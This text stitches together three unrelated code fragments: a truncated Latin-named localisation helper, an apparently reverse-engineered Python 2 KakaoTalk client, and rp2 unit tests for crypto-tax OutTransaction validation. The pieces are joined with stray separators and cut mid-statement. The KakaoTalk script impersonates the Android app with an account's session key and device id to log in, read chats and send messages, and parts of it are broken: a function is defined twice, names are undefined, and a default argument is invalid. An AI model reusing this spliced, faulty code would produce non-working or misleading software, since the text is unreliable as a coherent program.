# <trans-unit id="L10N_ego_codicem" translate="no" approved="yes">
# <source>por-Latn</source>
# <target state="final">spa-Latn</target>
# <note annotates="source" priority="2">
# _ [eng-Latn]eng-Latn[eng-Latn]_
# </note>
# </trans-unit>
resultatum['conceptum_signum'] = 'trans-unit'
resultatum['fontem'] = 'source'
resultatum['objectivum'] = 'target'
return resultatum
@staticmethod
def quid_est_hashtag_circa_conceptum(
hxl_hashtag: str) -> Union[bool, None]:
"""Quid est hashtag circa +conceptum?
_[eng-Latn]
Is this hashtag about concept level?
[eng-Latn]
Args:
hxl_hashtag (str): Hashtag ad textum
Returns:
bool:
"""
# TODO: make | |
<filename>kakao/kakao.py
import sys
import struct
import base64
import rsa as RSA
import socket
import bson
import json
import urllib, urllib2
import httplib
from bson import BSON
from bson.py3compat import b
from Crypto.Cipher import AES
from pkcs7 import PKCS7Encoder
# PKCS#7 padder/unpadder used for the AES payloads.
encoder = PKCS7Encoder()
# Session AES key; the value below is redaction residue ("\<KEY>") and must
# be replaced with the real key before this script can work.
aes_key='\<KEY>'
sKey = u'' # you need to know sKey for your current account
duuid = u'' # you need to know duuid for your current account
user_id = '' # this is not necessary for most of the commands
def get_list():
    """Fetch the chat-room list via KakaoTalk's HTTPS API.

    Requires the module globals sKey and duuid for the current account;
    returns the decoded 'chatRooms' list from the JSON reply, or None when
    credentials are missing.
    """
    global duuid, sKey
    if duuid == u'':
        print "[x] ERROR: duuid is not defined"
        return
    elif sKey == u'':
        print "[x] ERROR: sKey is not defined"
        return
    print "[$] START GET"
    url = 'https://ch-talk.kakao.com/android/chats/list.json'
    # Headers mimic the official Android client; 'S' carries the session
    # credential as "<sKey>-<duuid>".
    headers = { 'GET' : '/android/chats/list.json',
                'HOST' : 'ch-talk.kakao.com',
                'Connection' : 'Close',
                'Accept-Language' : 'ko',
                'Content-Transfer-Encoding' : 'UTF-8',
                'User-Agent' : 'KakaoTalkAndroid/3.8.7 Android/4.1.2',
                'A' : 'android/3.8.7/ko',
                'S' : sKey + '-' + duuid,
                'Cache-Control' : 'no-cache',
                'Content-Type' : 'application/x-www-form-urlencoded',
                'Content-Length' : '0' }
    request = urllib2.Request(url, None, headers)
    response = urllib2.urlopen(request)
    data = response.read()
    data = json.loads(data ,encoding='utf-8')
    return data['chatRooms']
def start():
    """Open an encrypted session to the chat gateway and return the socket.

    Performs CHECKIN to discover host/port, then sends the crypto handshake
    followed by an AES-encrypted LOGIN packet (4-byte length prefix +
    ciphertext). Exits the process if no reply is received.
    """
    global duuid, sKey
    if duuid == u'':
        print "[x] ERROR: duuid is not defined"
        return
    elif sKey == u'':
        print "[x] ERROR: sKey is not defined"
        return
    elif user_id == '':
        print "[x] ERROR: user_id is not defined"
        return
    print "[*] START SOCKET"
    document = checkin() # android
    host = document['host']
    port = document['port']
    print "[!] HOST : " + host
    print "[!] PORT : " + str(port)
    h = hand()
    l = login()
    # Commands after the handshake are AES-encrypted and framed with a
    # 4-byte little-endian length prefix.
    enc_l = enc_aes(l)
    command = struct.pack('I',len(enc_l)) + enc_l
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((str(host),port))
    s.settimeout(5)
    s.send(h + command)
    try:
        reply = s.recv(40960)
        hex_secure(reply)
    except:
        print "[x] START ERROR "
        for e in sys.exc_info():
            print e
        sys.exit(1)
    return s
def hex_secure(data):
    """Decrypt a framed reply (4-byte length prefix + AES payload) and print it.

    Relies on dec_aes/hex_to_dic defined elsewhere in this module.
    """
    dec_h = dec_aes(data[4:])
    # Bytes 6:17 of the plaintext hold the method name; the BSON body is
    # decoded from offset 22 onward — presumably past the packet header
    # (id/status/method/body-type) — TODO confirm against the packet layout.
    print ' [' + dec_h[6:17] + ']',
    print hex_to_dic(encoder.decode(dec_h[22:]))
def hex_string(data):
    """Decrypt a textual hex dump (e.g. "0x12, 0x34, ...}") captured from logs.

    Converts the dump back to raw bytes, strips the 4-byte length prefix and
    decrypts the remainder with the session AES key.
    """
    data = data.split('}')[0].replace('\n','').replace(', 0x','\\x').strip().replace('0x','\\x').decode("string-escape")
    # BUG FIX: the decrypted payload was computed and silently discarded
    # (the function returned None); return it so callers can use it.
    dec_h = dec_aes(data[4:])
    return dec_h
def hex_nosecure(h):
    """Print an already-decrypted packet: method name and decoded BSON body."""
    # Same offsets as hex_secure, but without the decrypt step.
    print '[' + h[6:17] + ']',
    print hex_to_dic(encoder.decode(h[22:]))
def checkin():
    """Send a plaintext CHECKIN packet and return the decoded BSON reply.

    The reply document contains the chat gateway 'host' and 'port' used by
    start(). Requires the module global user_id.
    """
    global user_id
    if user_id == '':
        print "[x] ERROR: user_id is not defined"
        return
    new = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # NOTE(review): hardcoded gateway address (looks like an anonymized
    # placeholder) — verify before use.
    new.connect(('172.16.58.3', 5228))
    data = '\x12\x27\x00\x00' # Packet ID (4)
    data += '\x00\x00' # Status Code (2)
    data += 'CHECKIN\x00\x00\x00\x00' # Method (11)
    data += '\x00' # Body Type (1)
    body = BSON.encode({u'useSub': True, u'ntype': 3, u'userId': user_id, u'MCCMNC': None, u'appVer': u'3.8.7', u'os': u'android'})
    # The first 4 bytes of a BSON document are its little-endian total
    # length, so body[:4] doubles as the Body Length field.
    data += body[:4] # Body Length (4)
    data += body # Body Contents
    new.sendall(data)
    reply = new.recv(20480)
    # Skip the 22-byte reply header before decoding the BSON body.
    bs = reply[22:]
    (document, _) = bson._bson_to_dict(bs,dict, True, bson.OLD_UUID_SUBTYPE)
    print "[*] CHECKIN"
    return document
def buy():
    """Send a plaintext BUY packet and return the decoded BSON reply.

    NOTE(review): unlike checkin(), user_id is not validated here even
    though it is included in the body.
    """
    new = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    new.connect(('172.16.58.3', 5228))
    data = '\x01\x00\x00\x00' # Packet ID (4)
    data += '\x00\x00' # Status Code (2)
    data += 'BUY\x00\x00\x00\x00\x00\x00\x00\x00' # Method (11)
    data += '\x00' # Body Type (1)
    body = BSON.encode({u'ntype': 3, u'countryISO': u'US', u'userId': user_id, u'MCCMNC': None, u'appVer': u'3.8.7', u'os': u'android', u'voip': False})
    # BSON documents start with their own 4-byte little-endian length.
    data += body[:4] # Body Length (4)
    data += body # Body Contents
    new.sendall(data)
    reply = new.recv(4096)
    # Skip the 22-byte reply header before decoding the BSON body.
    bs = reply[22:]
    (document, _) = bson._bson_to_dict(bs,dict, True, bson.OLD_UUID_SUBTYPE)
    print "[*] BUY"
    return document
def enc_rsa(secret):
    """Encrypt *secret* with the chat server's RSA public key.

    Used by hand() to ship the session AES key during the handshake.
    """
    # BUG FIX: the modulus literal was redaction residue ("n = <KEY>"),
    # which is a syntax error and made the whole module unparseable. The
    # real public modulus must be restored below before use.
    n = None  # TODO: restore the server's RSA public modulus here
    e = 3
    if n is None:
        raise ValueError("enc_rsa: RSA public modulus is not configured")
    pub_key = RSA.PublicKey(n, e)
    enc_key = RSA.encrypt(secret, pub_key)
    return enc_key
def hand():
    """Build the plaintext handshake header sent before the first command.

    Declares key-exchange and cipher choices, then appends the session AES
    key encrypted under the server's RSA public key.
    """
    hand = '\x80\x00\x00\x00'
    hand += '\x01\x00\x00\x00' # RSA = 1, DH = 2
    hand += '\x01\x00\x00\x00' # AES_CBC=1, AES_CFB128=2, AES_OFB128=3, RC4=4
    hand += enc_rsa(aes_key)
    return hand
def command_send(s, data):
    """AES-encrypt *data*, frame it with a 4-byte length prefix, send it on
    socket *s*, and print the decrypted reply.

    Returns True when a reply was received and printed, False otherwise.
    """
    enc_data = enc_aes(data)
    command = struct.pack('I',len(enc_data)) + enc_data
    s.send(command)
    try:
        reply = s.recv(40960)
        hex_secure(reply)
    except:
        # Bare except: any failure (timeout included) is reported and
        # swallowed so callers just see False.
        print "[x] ERROR "
        for e in sys.exc_info():
            print e
        return False
    return True
def login():
global duuid, sKey
if duuid == u'':
print "[x] ERROR: duuid is not defined"
return
elif sKey == u'':
print "[x] ERROR: sKey is not defined"
return
print " [*] LOGIN"
data = '\x14\x00\x00\x00' # Packet ID
data += '\x00\x00' # Status Code : when sending command -> 0
data += 'LOGIN\x00\x00\x00\x00\x00\x00' # Method
data += '\x00' # Body Type : when sending command -> 0
body = BSON.encode({u'opt': u'', u'prtVer': u'1.0', u'appVer': u'1.5.0', u'os': u'wp', u'lang': u'ko', u'sKey': sKey, u'duuid': duuid, u'ntype': 3, u'MCCMNC': None})
body = BSON.encode({u'opt': u'', u'prtVer': u'1.0', u'appVer': u'3.8.7', u'os': u'android', u'lang': u'en', u'sKey': sKey, u'duuid': duuid, u'ntype': 3, u'MCCMNC': None})
data += body[:4]
data += body
return data
def chaton(s, chatId):
    """Send CHATON for *chatId* (quiet variant, banner print disabled).

    NOTE(review): this definition is shadowed by a second `chaton` defined
    later in this module (different packet id, prints a banner); at import
    time the later definition wins, making this one dead code.
    """
    msg = " [*] CHATON : " + str(chatId)
    #print msg
    data = '\x05\x00\x00\x00' # Packet ID
    data += '\x00\x00' # Status Code : when sending command -> 0
    data += 'CHATON\x00\x00\x00\x00\x00' # Method
    data += '\x00' # Body Type : when sending command -> 0
    body = BSON.encode({u'chatId': chatId})
    data += body[:4]
    data += body
    succ = command_send(s, data)
    return succ
def nchatlist(s):
print " [*] NCHATLIST"
data = '\x06\x00\x00\x00' # Packet ID
data += '\x00\x00' # Status Code : when sending command -> 0
data += 'NCHATLIST\x00\x00' # Method
data += '\x00' # Body Type : when sending command -> 0
body = BSON.encode({u'maxIds': [], u'chatIds': []})
data += body[:4]
data += body
enc_data = enc_aes(data)
command = struct.pack('I',len(enc_data)) + enc_data
s.send(command)
reply = ''
while True:
try:
new = s.recv(1024)
reply += new
except socket.timeout:
break
while True:
try:
dec_h = dec_aes(reply[4:hex_to_num(reply[:4])+4])
reply = reply[hex_to_num(reply[:4])+4:]
result = dec_packet(dec_h)
print " [-]" + result['command'],
b = result['body']
print " from " + b['chatLog']['authorId'] + '('+ b[authorNickname] + ') : ' + b['chatLog']['message']
except:
break
return True
#succ = command_send(s, data)
#return succ
def leave(s, chatId):
    """Send LEAVE to exit chat room *chatId*; returns command_send's status."""
    print " [*] LEAVE from " + str(chatId)
    data = '\x06\x00\x00\x00' # Packet ID
    data += '\x00\x00' # Status Code : when sending command -> 0
    data += 'LEAVE\x00\x00\x00\x00\x00\x00' # Method
    data += '\x00' # Body Type : when sending command -> 0
    body = BSON.encode({u'chatId': chatId})
    # body[:4] is the BSON document's own little-endian length prefix.
    data += body[:4]
    data += body
    succ = command_send(s, data)
    return succ
#[CHATON] {u'chatId': }
def chaton(s, chatId):
    """Send CHATON to open chat room *chatId*; returns command_send's status.

    NOTE(review): this redefines the earlier `chaton` (which used packet id
    \\x05 and no banner); this later definition is the one in effect.
    """
    print " [*] CHATON from " + str(chatId)
    data = '\x07\x00\x00\x00' # Packet ID
    data += '\x00\x00' # Status Code : when sending command -> 0
    data += 'CHATON\x00\x00\x00\x00\x00' # Method
    data += '\x00' # Body Type : when sending command -> 0
    body = BSON.encode({u'chatId': chatId})
    data += body[:4]
    data += body
    succ = command_send(s, data)
    return succ
#[PING]
def ping(s):
    """Send a PING keep-alive; returns command_send's status."""
    print " [*] PING"
    data = '\x09\x00\x00\x00' # Packet ID
    data += '\x00\x00' # Status Code : when sending command -> 0
    data += 'PING\x00\x00\x00\x00\x00\x00\x00' # Method
    data += '\x00' # Body Type : when sending command -> 0
    # No BSON body: 4 zero bytes followed by ten 0x0a filler bytes.
    data += '\x00\x00\x00\x00\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a'
    succ = command_send(s, data)
    return succ
#[UPSEEN] {u'status': 0, u'isOK': True, u'errMsg': None}
def upseen(s, chatId):
    """Send UPSEEN (update seen-state) for *chatId*; returns command_send's status."""
    print " [*] UPSEEN from " + str(chatId)
    data = '\x08\x00\x00\x00' # Packet ID
    data += '\x00\x00' # Status Code : when sending command -> 0
    data += 'UPSEEN\x00\x00\x00\x00\x00' # Method
    data += '\x00' # Body Type : when sending command -> 0
    body = BSON.encode({u'max': 0L, u'cnt': 5, u'cur': 0L, u'chatId': chatId})
    data += body[:4]
    data += body
    succ = command_send(s, data)
    return succ
#[READ] {u'since': 0L, u'chatId': }
def read(s, chatId = chatId):
print " [*] READ from " + str(chatId)
data = '\x06\x00\x00\x00' # Packet ID
data += '\x00\x00' # Status Code : when sending command -> 0
data += 'READ\x00\x00\x00\x00\x00\x00\x00' # Method
data += '\x00' # Body Type : when sending command -> 0
body = BSON.encode({u'chatId': chatId, u'since': 462937779245527040L})
data += body[:4]
data += body
succ = command_send(s, data)
return succ
def write(s, chatId, msg = u'test'):
    """Send a WRITE (text message, type=1) to chat room *chatId*.

    Returns command_send's status.
    """
    try:
        print " [*] WRITE to " + str(chatId) + " : " + str(msg)
    except:
        # str(msg) can fail on non-ASCII unicode; the send still proceeds.
        print " [*] WRITE to " + str(chatId) + " : ???"
    data = '\x06\x00\x00\x00' # Packet ID
    data += '\x00\x00' # Status Code : when sending command -> 0
    data += 'WRITE\x00\x00\x00\x00\x00\x00' # Method
    data += '\x00' # Body Type : when sending command -> 0
    body = BSON.encode({u'chatId': chatId, u'msg': msg, u'extra': None, u'type': 1})
    data += body[:4]
    data += body
    succ = command_send(s, data)
    return succ
#write_pic(s, url=upload_pic())
def write_pic(s, chatId = 42865071710223L, url = "", width = 800, height = 600):
print " [*] WRITE PICTURE to " + str(chatId) + | |
<reponame>houqp/rp2
# Copyright 2021 eprbell
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import unittest
from dateutil.tz import tzoffset
from rp2.configuration import Configuration
from rp2.entry_types import TransactionType
from rp2.intra_transaction import IntraTransaction
from rp2.out_transaction import OutTransaction
from rp2.plugin.country.us import US
from rp2.rp2_decimal import RP2Decimal
from rp2.rp2_error import RP2TypeError, RP2ValueError
class TestOutTransaction(unittest.TestCase):
    # Shared Configuration, loaded once for every test in this class.
    _configuration: Configuration

    @classmethod
    def setUpClass(cls) -> None:
        # Load the test configuration with the US country plugin; the path
        # is relative to the repository root.
        TestOutTransaction._configuration = Configuration("./config/test_data.config", US())
    def setUp(self) -> None:
        # Show full diffs on assertion failures (unittest truncates by default).
        self.maxDiff = None  # pylint: disable=invalid-name
    def test_taxable_out_transaction(self) -> None:
        """A SELL is taxable: verify derived amounts, parsed fields and the
        plain/indent/repr string renderings of an OutTransaction."""
        out_transaction: OutTransaction = OutTransaction(
            self._configuration,
            "6/1/2020 3:59:59 -04:00",
            "B1",
            "Coinbase Pro",
            "Bob",
            "SELL",
            RP2Decimal("900.9"),
            RP2Decimal("2.2"),
            RP2Decimal("0.01"),
            internal_id=38,
        )
        OutTransaction.type_check("my_instance", out_transaction)
        self.assertTrue(out_transaction.is_taxable())
        # Taxable amount excludes the fee: 900.9 * 2.2 = 1981.98.
        self.assertEqual(RP2Decimal("1981.98"), out_transaction.fiat_taxable_amount)
        self.assertEqual(RP2Decimal("2.2"), out_transaction.crypto_taxable_amount)
        self.assertEqual("38", out_transaction.internal_id)
        self.assertEqual(2020, out_transaction.timestamp.year)
        self.assertEqual(6, out_transaction.timestamp.month)
        self.assertEqual(1, out_transaction.timestamp.day)
        self.assertEqual(3, out_transaction.timestamp.hour)
        self.assertEqual(59, out_transaction.timestamp.minute)
        self.assertEqual(59, out_transaction.timestamp.second)
        # -04:00 == 14400 seconds west of UTC.
        self.assertEqual(tzoffset(None, -14400), out_transaction.timestamp.tzinfo)
        self.assertEqual("B1", out_transaction.asset)
        self.assertEqual("Coinbase Pro", out_transaction.exchange)
        self.assertEqual("Bob", out_transaction.holder)
        self.assertEqual(TransactionType.SELL, out_transaction.transaction_type)
        self.assertEqual(RP2Decimal("900.9"), out_transaction.spot_price)
        self.assertEqual(RP2Decimal("2.2"), out_transaction.crypto_out_no_fee)
        # Balance changes include the fee: 2.2 + 0.01 and 900.9 * 2.21.
        self.assertEqual(RP2Decimal("2.21"), out_transaction.crypto_balance_change)
        self.assertEqual(RP2Decimal("1990.989"), out_transaction.fiat_balance_change)
        self.assertEqual(
            str(out_transaction),
            """OutTransaction:
  id=38
  timestamp=2020-06-01 03:59:59.000000 -0400
  asset=B1
  exchange=Coinbase Pro
  holder=Bob
  transaction_type=TransactionType.SELL
  spot_price=900.9000
  crypto_out_no_fee=2.20000000
  crypto_fee=0.01000000
  unique_id=
  is_taxable=True
  fiat_taxable_amount=1981.9800""",
        )
        self.assertEqual(
            out_transaction.to_string(2, repr_format=False, extra_data=["foobar", "qwerty"]),
            """    OutTransaction:
      id=38
      timestamp=2020-06-01 03:59:59.000000 -0400
      asset=B1
      exchange=Coinbase Pro
      holder=Bob
      transaction_type=TransactionType.SELL
      spot_price=900.9000
      crypto_out_no_fee=2.20000000
      crypto_fee=0.01000000
      unique_id=
      is_taxable=True
      fiat_taxable_amount=1981.9800
      foobar
      qwerty""",
        )
        self.assertEqual(
            out_transaction.to_string(2, repr_format=True, extra_data=["foobar", "qwerty"]),
            (
                "    OutTransaction("
                "id='38', "
                "timestamp='2020-06-01 03:59:59.000000 -0400', "
                "asset='B1', "
                "exchange='Coinbase Pro', "
                "holder='Bob', "
                "transaction_type=<TransactionType.SELL: 'sell'>, "
                "spot_price=900.9000, "
                "crypto_out_no_fee=2.20000000, "
                "crypto_fee=0.01000000, "
                "unique_id=, "
                "is_taxable=True, "
                "fiat_taxable_amount=1981.9800, "
                "foobar, "
                "qwerty)"
            ),
        )
def test_out_transaction_equality_and_hashing(self) -> None:
out_transaction: OutTransaction = OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
"Bob",
"SELL",
RP2Decimal("900.9"),
RP2Decimal("2.2"),
RP2Decimal("0.01"),
internal_id=38,
)
out_transaction2: OutTransaction = OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
"Bob",
"SELL",
RP2Decimal("900.9"),
RP2Decimal("2.2"),
RP2Decimal("0.01"),
internal_id=38,
)
out_transaction3: OutTransaction = OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
"Bob",
"SELL",
RP2Decimal("900.9"),
RP2Decimal("2.2"),
RP2Decimal("0.01"),
internal_id=7,
)
self.assertEqual(out_transaction, out_transaction)
self.assertEqual(out_transaction, out_transaction2)
self.assertNotEqual(out_transaction, out_transaction3)
self.assertEqual(hash(out_transaction), hash(out_transaction))
self.assertEqual(hash(out_transaction), hash(out_transaction2))
# These hashes would only be equal in case of hash collision (possible but very unlikey)
self.assertNotEqual(hash(out_transaction), hash(out_transaction3))
def test_bad_to_string(self) -> None:
out_transaction: OutTransaction = OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
"Bob",
"SELL",
RP2Decimal("900.9"),
RP2Decimal("2.2"),
RP2Decimal("0.01"),
internal_id=38,
)
with self.assertRaisesRegex(RP2TypeError, "Parameter 'indent' has non-integer value"):
out_transaction.to_string(None, repr_format=False, extra_data=["foobar", "qwerty"]) # type: ignore
with self.assertRaisesRegex(RP2ValueError, "Parameter 'indent' has non-positive value.*"):
out_transaction.to_string(-1, repr_format=False, extra_data=["foobar", "qwerty"])
with self.assertRaisesRegex(RP2TypeError, "Parameter 'repr_format' has non-bool value .*"):
out_transaction.to_string(1, repr_format="False", extra_data=["foobar", "qwerty"]) # type: ignore
with self.assertRaisesRegex(RP2TypeError, "Parameter 'extra_data' is not of type List"):
out_transaction.to_string(1, repr_format=False, extra_data="foobar") # type: ignore
def test_bad_out_transaction(self) -> None:
with self.assertRaisesRegex(RP2TypeError, "Parameter name is not a string:.*"):
OutTransaction.type_check(None, None) # type: ignore
with self.assertRaisesRegex(RP2TypeError, "Parameter 'my_instance' is not of type OutTransaction:.*"):
OutTransaction.type_check("my_instance", None) # type: ignore
with self.assertRaisesRegex(RP2TypeError, "Parameter 'my_instance' is not of type OutTransaction: IntraTransaction"):
OutTransaction.type_check(
"my_instance",
IntraTransaction(
self._configuration,
"2021-01-12T11:51:38Z",
"B1",
"BlockFi",
"Bob",
"Coinbase",
"Alice",
RP2Decimal("10000"),
RP2Decimal("1"),
RP2Decimal("1"),
internal_id=45,
),
)
with self.assertRaisesRegex(RP2TypeError, "Parameter 'configuration' is not of type Configuration: .*"):
# Bad configuration
OutTransaction(
(1, 2, 3), # type: ignore
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
"Bob",
"GIFT",
RP2Decimal("900.9"),
RP2Decimal("2.2"),
RP2Decimal("0"),
internal_id=38,
)
with self.assertRaisesRegex(RP2TypeError, "Parameter 'configuration' is not of type Configuration: .*"):
# Bad configuration
OutTransaction(
None, # type: ignore
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
"Bob",
"SELL",
RP2Decimal("900.9"),
RP2Decimal("2.2"),
RP2Decimal("0"),
internal_id=38,
)
with self.assertRaisesRegex(RP2TypeError, "Parameter 'internal_id' has non-integer value .*"):
# Bad internal_id
OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
"Bob",
"SELL",
RP2Decimal("900.9"),
RP2Decimal("2.2"),
RP2Decimal("0"),
internal_id=(1, 2, 3), # type: ignore
)
with self.assertRaisesRegex(RP2TypeError, "Parameter 'timestamp' has non-string value .*"):
# Bad timestamp
OutTransaction(
self._configuration,
None, # type: ignore
"B1",
"Coinbase Pro",
"Bob",
"gIfT",
RP2Decimal("900.9"),
RP2Decimal("2.2"),
RP2Decimal("0"),
internal_id=38,
)
with self.assertRaisesRegex(RP2ValueError, "Parameter 'timestamp' value has no timezone info: .*"):
# Bad timestamp
OutTransaction(
self._configuration,
"6/1/2020 3:59:59",
"B1",
"Coinbase Pro",
"Bob",
"selL",
RP2Decimal("900.9"),
RP2Decimal("2.2"),
RP2Decimal("0"),
internal_id=38,
)
with self.assertRaisesRegex(RP2TypeError, "Parameter 'timestamp' has non-string value .*"):
# Bad timestamp
OutTransaction(
self._configuration,
(1, 2, 3), # type: ignore
"B1",
"Coinbase Pro",
"Bob",
"GIFT",
RP2Decimal("900.9"),
RP2Decimal("2.2"),
RP2Decimal("0"),
internal_id=38,
)
with self.assertRaisesRegex(RP2ValueError, "Parameter 'asset' value is not known: .*"):
# Bad asset
OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"YYY",
"Coinbase Pro",
"Bob",
"SELL",
RP2Decimal("900.9"),
RP2Decimal("2.2"),
RP2Decimal("0"),
internal_id=38,
)
with self.assertRaisesRegex(RP2TypeError, "Parameter 'asset' has non-string value .*"):
# Bad asset
OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
None, # type: ignore
"Coinbase Pro",
"Bob",
"SELL",
RP2Decimal("900.9"),
RP2Decimal("2.2"),
RP2Decimal("0"),
internal_id=38,
)
with self.assertRaisesRegex(RP2ValueError, "Parameter 'exchange' value is not known: .*"):
# Bad exchange
OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
"CoinbasE Pro",
"Bob",
"SELL",
RP2Decimal("900.9"),
RP2Decimal("2.2"),
RP2Decimal("0"),
internal_id=38,
)
with self.assertRaisesRegex(RP2TypeError, "Parameter 'exchange' has non-string value .*"):
# Bad exchange
OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
None, # type: ignore
"Bob",
"SELL",
RP2Decimal("900.9"),
RP2Decimal("2.2"),
RP2Decimal("0"),
internal_id=38,
)
with self.assertRaisesRegex(RP2ValueError, "Parameter 'holder' value is not known: .*"):
# Bad holder
OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
"foobar",
"SELL",
RP2Decimal("900.9"),
RP2Decimal("2.2"),
RP2Decimal("0"),
internal_id=38,
)
with self.assertRaisesRegex(RP2TypeError, "Parameter 'holder' has non-string value .*"):
# Bad holder
OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
None, # type: ignore
"SELL",
RP2Decimal("900.9"),
RP2Decimal("2.2"),
RP2Decimal("0"),
internal_id=38,
)
with self.assertRaisesRegex(RP2ValueError, ".*OutTransaction .*, id.*invalid transaction type .*"):
# Bad transaction type
OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
"Bob",
"Buy",
RP2Decimal("900.9"),
RP2Decimal("2.2"),
RP2Decimal("0"),
internal_id=38,
)
with self.assertRaisesRegex(RP2ValueError, ".*OutTransaction .*, id.*invalid transaction type .*"):
# Bad transaction type
OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
"Bob",
"iNteResT",
RP2Decimal("900.9"),
RP2Decimal("2.2"),
RP2Decimal("0"),
internal_id=38,
)
with self.assertRaisesRegex(RP2ValueError, "Parameter .* has invalid transaction type value: .*"):
# Bad transaction type
OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
"Bob",
"BEND",
RP2Decimal("900.9"),
RP2Decimal("2.2"),
RP2Decimal("0"),
internal_id=38,
)
with self.assertRaisesRegex(RP2TypeError, "Parameter .* has non-string value .*"):
# Bad transaction type
OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
"Bob",
None, # type: ignore
RP2Decimal("900.9"),
RP2Decimal("2.2"),
RP2Decimal("0"),
internal_id=38,
)
with self.assertRaisesRegex(RP2ValueError, "OutTransaction .*, id.*parameter 'spot_price' cannot be 0"):
# Bad spot price
OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
"Bob",
"SELL",
RP2Decimal("0"),
RP2Decimal("2.2"),
RP2Decimal("0"),
internal_id=38,
)
with self.assertRaisesRegex(RP2ValueError, "Parameter 'spot_price' has non-positive value .*"):
# Bad spot price
OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
"Bob",
"SELL",
RP2Decimal("-900.9"),
RP2Decimal("2.2"),
RP2Decimal("0"),
internal_id=38,
)
with self.assertRaisesRegex(RP2TypeError, "Parameter 'spot_price' has non-RP2Decimal value ,*"):
# Bad spot price
OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
"Bob",
"GIFT",
None, # type: ignore
RP2Decimal("2.2"),
RP2Decimal("0"),
internal_id=38,
)
with self.assertRaisesRegex(RP2ValueError, "Parameter 'crypto_out_no_fee' has zero value"):
# Bad crypto out no fee
OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
"Bob",
"GIFT",
RP2Decimal("900.9"),
RP2Decimal("0"),
RP2Decimal("0"),
internal_id=38,
)
with self.assertRaisesRegex(RP2ValueError, "Parameter 'crypto_out_no_fee' has non-positive value .*"):
# Bad crypto out no fee
OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
"Bob",
"SELL",
RP2Decimal("900.9"),
RP2Decimal("-2.2"),
RP2Decimal("0"),
internal_id=38,
)
with self.assertRaisesRegex(RP2TypeError, "Parameter 'crypto_out_no_fee' has non-RP2Decimal value .*"):
# Bad crypto out no fee
OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
"Bob",
"SELL",
RP2Decimal("900.9"),
None, # type: ignore
RP2Decimal("0"),
internal_id=38,
)
with self.assertRaisesRegex(RP2ValueError, "fee-typed transaction has non-zero 'crypto_out_no_fee'"):
# Bad crypto out no fee
OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
"Bob",
"FEE",
RP2Decimal("900.9"),
RP2Decimal("10"),
RP2Decimal("0"),
internal_id=38,
)
with self.assertRaisesRegex(RP2ValueError, "Parameter 'crypto_fee' has non-positive value .*"):
# Bad crypto fee
OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
"Bob",
"SELL",
RP2Decimal("900.9"),
RP2Decimal("2.2"),
RP2Decimal("-0.1"),
internal_id=38,
)
with self.assertRaisesRegex(RP2TypeError, "Parameter 'crypto_fee' has non-RP2Decimal value .*"):
# Bad crypto fee
OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
"Bob",
"SELL",
RP2Decimal("900.9"),
RP2Decimal("2.2"),
"foobar", # type: ignore
internal_id=38,
)
with self.assertRaisesRegex(RP2ValueError, "Parameter 'fiat_out_no_fee' has non-positive value .*"):
# Bad fiat_out_no_fee
OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
"Bob",
"SELL",
RP2Decimal("900.9"),
RP2Decimal("2.2"),
RP2Decimal("0"),
fiat_out_no_fee=RP2Decimal("-0.1"),
internal_id=38,
)
with self.assertRaisesRegex(RP2TypeError, "Parameter 'fiat_out_no_fee' has non-RP2Decimal value .*"):
# Bad fiat_out_no_fee
OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
"Bob",
"SELL",
RP2Decimal("900.9"),
RP2Decimal("2.2"),
RP2Decimal("0"),
fiat_out_no_fee="foobar", # type: ignore
internal_id=38,
)
